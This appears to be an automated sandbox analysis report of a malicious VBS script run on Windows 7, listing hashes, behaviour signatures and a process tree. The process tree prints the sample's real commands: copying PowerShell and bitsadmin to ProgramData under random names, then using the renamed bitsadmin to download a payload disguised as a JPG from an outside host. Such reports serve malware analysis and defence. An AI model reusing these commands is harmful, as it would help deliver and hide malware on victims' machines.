Analysis
-
max time kernel
117s -
max time network
124s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
21-02-2022 22:29
Static task
static1
Behavioral task
behavioral1
Sample
56912c17def5a45f1d8f35567a25441e745ca0dbdc71668df3cee70a2638254b.vbs
Resource
win7-en-20211208
windows7_x64
0 signatures
0 seconds
General
-
Target
56912c17def5a45f1d8f35567a25441e745ca0dbdc71668df3cee70a2638254b.vbs
-
Size
9KB
-
MD5
f680c06c3ba90319e66f7e51879aa661
-
SHA1
97937ce0a605ac4ba37e25c090cc52b8d8c158ed
-
SHA256
56912c17def5a45f1d8f35567a25441e745ca0dbdc71668df3cee70a2638254b
-
SHA512
86def545293b71e4171f76f19f80628833e270c8ef62f1bda0de5fa22bbe86396888f17de296da9d0f5198c1435263be907d342034a7ebd5ff9c45f205bc8473
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1280 CtTkBBiin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 1684 wrote to memory of 2028 1684 WScript.exe 27 PID 1684 wrote to memory of 2028 1684 WScript.exe 27 PID 1684 wrote to memory of 2028 1684 WScript.exe 27 PID 2028 wrote to memory of 464 2028 cmd.exe 29 PID 2028 wrote to memory of 464 2028 cmd.exe 29 PID 2028 wrote to memory of 464 2028 cmd.exe 29 PID 2028 wrote to memory of 1064 2028 cmd.exe 30 PID 2028 wrote to memory of 1064 2028 cmd.exe 30 PID 2028 wrote to memory of 1064 2028 cmd.exe 30 PID 1684 wrote to memory of 1280 1684 WScript.exe 31 PID 1684 wrote to memory of 1280 1684 WScript.exe 31 PID 1684 wrote to memory of 1280 1684 WScript.exe 31 PID 1684 wrote to memory of 1280 1684 WScript.exe 31
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56912c17def5a45f1d8f35567a25441e745ca0dbdc71668df3cee70a2638254b.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\fnWDuSw.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\CtTkBBi*.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\system32\cmd.execmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\fnWDuSw.exe3⤵PID:464
-
-
C:\Windows\system32\cmd.execmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\CtTkBBi*.exe3⤵PID:1064
-
-
-
C:\ProgramData\CtTkBBiin.exe"C:\ProgramData\CtTkBBiin.exe" /transfer MbciAS /download https://cxminute.com/minu/LLLMRC84B29A944R/it.jpg C:\Users\Admin\AppData\Roaming\it.jpg2⤵
- Executes dropped EXE
PID:1280
-